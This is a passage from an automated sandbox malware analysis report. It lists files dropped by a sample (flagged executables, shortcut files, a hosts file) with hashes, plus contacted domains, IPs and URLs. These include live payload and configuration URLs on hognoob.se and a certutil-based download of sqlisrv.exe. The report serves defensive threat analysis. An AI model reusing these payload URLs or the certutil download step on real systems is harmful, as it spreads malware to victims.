SHA-256: CD0EE50E6C1C66C13BF74A79B5B7CDBEB663D4AC8484F6DDD9512933ECC9B8ED
SHA-512: F7C0AD5E51524C90D66B531C7DD4D00B6F5304F595705A15723915FE83CF8C044E121A3A82098DCB8432BB209597B06F11B17772CA1F105A345336C9107ADBB4
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........I.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_J.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 37EDF73CE2E3EA5F59644C457DEAF1BD
SHA1: B4C19996C04BA410122055ECE1BF1FF8F8FDE446
SHA-256: 52C90EAE20FB1F066B72598677E4B172EB2B84260890EAAADD1667A3F5389D28
SHA-512: F9049B1FC912142CE60820686701F7B2B7064DDD27239F54B83B6EC41FD979BAA61E38B04F9C0CF7C1D2FF16BC8E9ECA9C1E7873E24327470D5EDCB5D87B7D32
Copyright Joe Security LLC 2019 Page 23 of 69
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........J.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_J.lnk
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_K.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 8EBAFFDDD3BFDC7F2B265A6604800613
SHA1: A3682A4115ADF7E6C3839F4992341B17673E2EBA
SHA-256: 802B61F6C41910DC9342DB2C16C931722529DA8B008D14123D3DEFCAE29484DD
SHA-512: 602CB155FF580922DE09264E679ECFE29016454809D36B73504347CD05E2C58645A3D0C1A2E5EDE49152B35C5BB9B60E3E45511D6DFDF279039147589C71FD09
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........K.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_L.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.806339457340596
Encrypted: false
MD5: E27FDB6477D3919C253435F27C9F8627
SHA1: 53C66BF3A87F611F7BDCDFA06A0904D59FEC8FE1
SHA-256: 9FE20B026B84E71E92A5A5ED0B54063F28C6211DF39F347D0BADE87D4E77BDBF
SHA-512: 984059A33CCAD5193C774C541D097CB72AC28F5CA41DC6A34C57D8CE911475FE8179D878D3617A1F3E4249C64C6D9EC159CC66E6B8514F4CCF4924EF40DE6AB9
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........L.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_M.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8090548800102484
Encrypted: false
MD5: 9262E8951D00DD0C682F9ACDF8FFD2EE
SHA1: 3BAB200214281E46E9653D0D927A0CC04588FE4C
SHA-256: A729EAFFA3FA864B6BF6814994FA4D3B2E63C5365B40490EB858CD44BD098CCF
SHA-512: 163BB42ED4F2A52EB11559F6FC7AFCC5B24935267D611A055DB1C71B5D086AB95FD15F6A5772EDF5AC1B8CFDFEDF748111DE3D4DC0FD9F3AD5AE1BACA7FE6B82
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........M.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_N.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 198B21D41A4406D33AEE2FC4B5EC63E2
SHA1: 8C64BB545D1FC87D272928D9A655A5556290123A
SHA-256: 659518BB55F1C67FECE48E51E0931EEC2938909354E26C39185079B44F81B5CC
SHA-512: 2628E8BEF47CFA428CAC3F8330A7F577192F70F8C9FE71FA6F47377DF25B7A35E8ED57040DC7D86A31F0E4F77CF5E05BA3285A31C64315A0740C35F85EE136BD
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........N.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_O.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Copyright Joe Security LLC 2019 Page 24 of 69
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: FF5D147F73D448E3DAFAB5CCDF42E7A9
SHA1: C7FD4C857A9D9E5DD2FFB2C2719B5B18AFCC6C20
SHA-256: 762B4AA976AD0B1BD0A7733E9004BF05E1FD0220E918462870FC033ADC7E113D
SHA-512: A992AE04BBBDBDE1D62D5B3D2515064F776E2E061EFFEAFA43315B670D11D463086248634A566F76B9CBDB257F1105B8EAAA4D58F484E191691C749EDC71A204
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........O.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_O.lnk
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_P.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8032648063611956
Encrypted: false
MD5: 5693BA4532491DB73BC63882C0030431
SHA1: 9766D313374AD5BEA9ED9FB2A09EC7C070AF256E
SHA-256: 4A2C45D879ABD67B0BFFF4DECB8940DC63CE72E4558DFA536B18C8751E7DC6F0
SHA-512: 213587F2F9E6218D874CC68953BD5E925946E066FF4D0615061A349D2BB91C0D28F19E8BCC19435BF1AA1C95C612E3485E6C523AA6FB2363659440BAC09256B8
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........P.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_Q.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 6894AADED7EE80FE8C5219516D00B31F
SHA1: EAD35204149EE8DFA58958B5D2CB163070550EA2
SHA-256: 111F84171BE589592BB24D703C3D651E886F7DE419FA3C1AD61425C8163FD207
SHA-512: 90B7665E09554E26FBA794F97C3E46363A3511F9FA5D438B6DDEC905EAB2493F6D1A08F3C9A29D1FAFA06AAF2E4378E2CC14101F2B78341CF2E8A343F20048A6
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........Q.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_R.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 85DD38FD6FED65B649EA17BC745C1BEB
SHA1: 68742429FB3C5959439FA46BB2DF487BF9566103
SHA-256: 3204F0143A2C8842F26A0732DF797D1A54A23E7998903062FE9D763C417E4D69
SHA-512: 59A010CA8B50FD316357C84743BCC7B525677DE376448ABF68D82F191A819D379FE6492FF092594F2A2E8D3CE2E23BCA8FA29B938D0D686881D54AE7C51E2A79
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........R.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_S.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8090548800102484
Encrypted: false
MD5: 764F62436E973E7855356A1E64C3FAE5
SHA1: DB35DE551C409ADD0896F3CF091EFCDFCAE167FA
SHA-256: 73B87B180D30F04CC4BA83D41E12D073BDB62D9AD9130DF5D784F98098D20F92
Copyright Joe Security LLC 2019 Page 25 of 69
SHA-512: 13898FA6F1271E3798F5F5943D686ABF75A0206475ED7E68F97E13C265F50097705E62B28E4BA6537EC8DB3D9DBF7D9A2DD61E1BDB9057057CF09288CC8F1FF5
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........S.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_S.lnk
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_T.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: E9D4CFAE3C56B40CF5758743778307C6
SHA1: F4BEA6D7FF1CA26194E205ECBB3741D0975A18ED
SHA-256: 80C64F45A233D379221BE4E7B01AFB61244C19AB2B26B76CC72D4B694734E8FC
SHA-512: 66154E1D424326EDAF69CC0079B3A0ECCFEAB90935A1D11E19C8E5E7259135286E39FFE7EF4A1AA27CE59C11E30D8AB03CE8294D13F18DB9F13D6777D8073EB1
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........T.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_U.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: E28A46264870A35CF06F2B798F770F2D
SHA1: 3FD7C6E923DC63294853E6FCA0AC02101A3786EB
SHA-256: F4D6C03D9D64CB25A5BF14E23F25D35652D890A8C5F3D1B82D9D2DEA638DAD0A
SHA-512: 63DFC6EA564FDD4C675354BE5433B697BB60E6BA5B28C2673FFBD49FC02129F73DD51B4D8EC02DEB575A130CE7EEA0C573A407D10694F145BC8C9FABC3324224
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........U.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_V.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: A8576FA76A7B5CB76620436000BFA3AA
SHA1: BD01A08CEA2CF0F6243A4089B2C4C85FB9CCC529
SHA-256: 1E2E27EBF40A38CCC008DCF8C39A5B6DDCECDB97CA253780467778196227E3EF
SHA-512: 37ADFA7F9F6E8C802C2452EB00243D24D7983DA072900771AF57F0D0562DC3B3541D57AF30E78AF14103A28E92494DCDF770EA6545C221FEF71A61AA2C745625
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........V.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_W.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: B14D6F788920C6A554FF70B0A1BE95A5
SHA1: 6EB5F7B2FA96B9C7D70B70C221A21BB8F46590CB
SHA-256: AF15AE9ACF48284AA88182D56E1E7FEE1DEC638FCBFCF9B7E7413756A4D2857D
SHA-512: F74D87448422D09145272C40D883FF4CA8507D52D75AE79918B0CBD1B4092FACA1793E04017E6AEE8971A33716DDC8627616D3735122F2FEC513231888E3B670
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........W.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_X.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
Copyright Joe Security LLC 2019 Page 26 of 69
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 518381EF94EF92C159998DBBE5A598BD
SHA1: FD44E4D5E71C096B9A43492A068910421C13100E
SHA-256: 3F335E6630B2F7DCF68E5E4A9A5BEDFE17FF054AF9A26CED01D11B85C4B22B91
SHA-512: 83B1EA18537C76662BE30F9B0EF893A89B5148D1E22C03FAF98FA128470AE149AFFCC09CBB2E031C4007C6BBDADBA117ABB1FF8E6295EBD5E893D627826BD680
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........X.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_X.lnk
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_Y.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: FF27F3942A805A0EF80B27C4526F0829
SHA1: A4BA760D56E62C4C1E81E2DE08F655609F4995C3
SHA-256: C4C6B752C01A4C835A19F1BD69729B9D88402EEB68BE66E26C9D2440EBCCCB9C
SHA-512: 9D17E4A8FEC119C43CBFF123653C44CCD5131AA1A9AFB84E407BCB890A725E60F827C1ED1FB069CDC5F0178CBCE22B0397EFEA385AE02037DCF7526724ADC7A3
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........Y.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_Z.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: D27BF068B2968FB2B5D6975FCAA91390
SHA1: B1092656EBF537CB89CD16486B31FCDB2A92DCAB
SHA-256: BA5D989B90476054FDAD3754BA98AB39EC4BA0D9E712372993E0938C88BCF632
SHA-512: DA4B040CE9FE92F81E9A1E02574926CF385EE45C2926A7424DAD8DB3FC336DE8B3E2EC06766567595323CF4A0636E3BB13358159B6087F48FB90D582429DF16D
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........Z.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\SysWOW64\ycemck.exe
Process: C:\WebKitSdk\2.25.14\qwr4rt.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes): 73728
Entropy (8bit): 5.192189717439081
Encrypted: false
MD5: EABDC54C61088B769E9AF917AA6B05A4
SHA1: 14EE316DB299DF521B9EB37603D83F6750C1F1E6
SHA-256: 51E880F62A34CF8C49B343EFF2F94F75FB8060EDEA4F3B29E2230DC120D4D38F
SHA-512: 1BE88D2EDF5AD16B7F3DDFA08323A4A30C576C8A1528B179149713801D1A567A592DC8E36664D23DD95222ED614BD8BACC1AEC5E29A2240766F411FFF74BD997
Malicious: true
Antivirus: Antivirus: Avira, Detection: 100%Antivirus: virustotal, Detection: 79%, Browse
Joe Sandbox View:
Filename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: download.exe, Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: download.exe, Detection: malicious, BrowseFilename: , Detection: malicious, Browse
Copyright Joe Security LLC 2019 Page 27 of 69
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche...................PE..L....dY.................0...........5.......@....@.......................... ..............................................HU..x........'...........................................................................@[email protected]....).......0.................. ..`.rdata.......@... ...@..............@[email protected].......`.......`[email protected]....'.......0..................@..@................................................................................................................................................................................................................................................................................................................................................
C:\Windows\SysWOW64\ycemck.exe
C:\Windows\System32\drivers\etc\hosts
Process: C:\Windows\cc3d3243\b158ac7.exe
File Type: ASCII text, with CRLF line terminators
Size (bytes): 822
Entropy (8bit): 4.496194958534843
Encrypted: false
MD5: 44B5974CAB4A544EE9DF159CEBBA553F
SHA1: 2ADA6F1ABC516C916E4B9170F096EB4536B8D039
SHA-256: 0BAE62CA504D9D90B6181194F9858F7C770E816E7EE1C15428B40AF63C818721
SHA-512: 7B39D171C014BBA0539576F1612751B6951E5102D9B4BC46721F93159CE28E3FFD7D21473951EEFAEA1B4A84E0A976FB3231A38BB057BABB245FE02D786BCB1D
Malicious: true
Preview: # copyright (c) 1993-2009 microsoft corp...#..# this is a sample hosts file used by microsoft tcp/ip for windows...#..# this file contains the mappings of ip addresses to host names. each..# entry should be kept on an individual line. the ip address should..# be placed in the first column followed by the corresponding host name...# the ip address and the host name should be separated by at least one..# space...#..# additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# for example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within dns itself...#.127.0.0.1 localhost..#.::1 localhost
C:\Windows\Temp\sqlisrv.exe
Process: C:\Windows\SysWOW64\certutil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes): 4672000
Entropy (8bit): 7.82218228744185
Encrypted: false
MD5: 1328C9CC50BD324399B4A83CA043BE6E
SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3
SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7
SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2
Malicious: true
Antivirus: Antivirus: Avira, Detection: 100%Antivirus: Joe Sandbox ML, Detection: 100%Antivirus: virustotal, Detection: 74%, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....
C:\Windows\cc3d3243\b158ac7.exe
Process: C:\WebKitSdk\2.25.14\sqlisrv.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes): 4672000
Entropy (8bit): 7.82218228744185
Encrypted: false
MD5: 1328C9CC50BD324399B4A83CA043BE6E
SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3
SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7
SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2
Malicious: true
Antivirus: Antivirus: Avira, Detection: 100%Antivirus: Joe Sandbox ML, Detection: 100%Antivirus: virustotal, Detection: 74%, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....
\Device\ConDrvProcess: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe
File Type: ASCII text, with CRLF, CR line terminators
Size (bytes): 10528
Entropy (8bit): 4.311543004413748
Copyright Joe Security LLC 2019 Page 28 of 69
Encrypted: false
MD5: A66AD9C43AE7763A50F87C9058B5B0C1
SHA1: BE246856E1BA7645BF1531C3C72467036DA1FA10
SHA-256: A472726FEA59B0AE9A0B4C64CFA4F7CC52B0DD54C2F156EDAAD0A9C94F3EED54
SHA-512: 369BF96BDE0E45AF7BCE380FB3A37A1ABFA8A4432CA206F472D3CFF7C93A60713B36A63B17619CCB85C49A916B6F78833385A8A2FACA2BBACDBA59A173B3149F
Malicious: false
Preview: Fuck Man !....0 IP Scanned.Taking 0 Threads .0 IP Scanned.Taking 1 Threads .0 IP Scanned.Taking 2 Threads .0 IP Scanned.Taking 3 Threads .0 IP Scanned.Taking 4 Threads .0 IP Scanned.Taking 5 Threads .0 IP Scanned.Taking 6 Threads .0 IP Scanned.Taking 7 Threads .0 IP Scanned.Taking 8 Threads .0 IP Scanned.Taking 9 Threads .0 IP Scanned.Taking 10 Threads .0 IP Scanned.Taking 11 Threads .0 IP Scanned.Taking 12 Threads .0 IP Scanned.Taking 13 Threads .0 IP Scanned.Taking 14 Threads .0 IP Scanned.Taking 15 Threads .0 IP Scanned.Taking 16 Threads .0 IP Scanned.Taking 17 Threads .0 IP Scanned.Taking 18 Threads .0 IP Scanned.Taking 19 Threads .0 IP Scanned.Taking 20 Threads .0 IP Scanned.Taking 21 Threads .0 IP Scanned.Taking 22 Threads .0 IP Scanned.Taking 23 Threads .0 IP Scanned.Taking 24 Threads .0 IP Scanned.Taking 25 Threads .0 IP Scanned.Taking 26 Threads .0 IP Scanned.Taking 27 Threads .0 IP Scanned.Taking 28 Threads .0 IP Scanned.Taking 29 Threads .0 IP Scanned.Taking 30 Threads .0 IP
\Device\ConDrv
Name IP Active Malicious Antivirus Detection Reputation
2019.ip138.com 117.25.157.119 true false high
upa1.hognoob.se 172.104.161.101 true false high
upa2.hognoob.se 172.105.237.113 true false high
pxx.hognoob.se 23.106.122.2 true true unknown
q1a.hognoob.se 23.106.122.2 true false high
uio.hognoob.se 195.128.126.120 true false high
fid.hognoob.se 45.67.14.164 true false high
haq.hognoob.se 195.128.124.140 true false 6%, virustotal, Browse unknown
Name Malicious Antivirus Detection Reputation
uio.hognoob.se:63145/cfg.ini false high
fid.hognoob.se/sqlisrv.exe true 19%, virustotal, BrowseAvira URL Cloud: safe
unknown
Name Source Malicious Antivirus Detection Reputation
fid.hognoob.se/sqlisrv.exeC: certutil.exe, 0000000A.00000002.5515216968.00000000034D0000.00000004.sdmp, certutil.exe, 0000000A.00000002.5515380973.00000000034F0000.00000004.sdmp
false Avira URL Cloud: safe unknown
repository.certum.pl/ctnca.cer09 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
repository.certum.pl/cscasha2.cer0 sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp
false high
Domains and IPs
Contacted Domains
Contacted URLs
URLs from Memory and Binaries
Copyright Joe Security LLC 2019 Page 29 of 69
uio.hognoob.se:63145/cfg.inihttp://uio.heroherohero.info:63145/cfg.inihognoob
sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp
false Avira URL Cloud: safe unknown
